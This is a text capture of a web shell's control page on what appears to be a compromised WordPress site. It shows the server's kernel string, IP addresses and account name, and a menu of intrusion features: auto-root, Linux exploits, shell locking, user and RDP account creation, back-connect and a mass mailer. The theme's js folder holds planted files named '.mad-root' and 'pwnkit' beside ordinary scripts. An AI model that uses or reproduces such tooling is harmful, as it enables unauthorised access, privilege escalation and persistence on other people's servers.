Linux webd002.cluster130.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.130.40.2 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
8.3.31
espacpq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
espacpq /
www /
wp-content /
themes /
alpha /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
vendor
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
accordion.js
687
B
-rw-r--r--
buttons.js
858
B
-rw-r--r--
customizer.js
1018
B
-rw-r--r--
navigation.js
2.22
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
slider.js
1008
B
-rw-r--r--
tabs.js
791
B
-rw-r--r--
video-popup.js
1.92
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : accordion.js
( function ( $ ) { if ( ! $( ".alpha-accordion" ).length ) { return; } $.fn.alphaAccordion = function () { $( this ).each( function ( _, acc ) { const tabs = $( acc ).find( ".alpha-accordion-tab" ); tabs.map( function ( _, el ) { const link = $( el ).find( ".alpha-accordion-title a" ); link.on( "click", function ( event ) { const tab = $( el ); event.preventDefault(); tabs.not( tab ).removeClass( "on" ); tab.toggleClass( "on" ); } ); return el; } ); $( acc ) .find( ".alpha-accordion-title a" ) .eq( 0 ) .trigger( "click" ); } ); return this; }; $( ".alpha-accordion" ).alphaAccordion(); } )( jQuery );
Close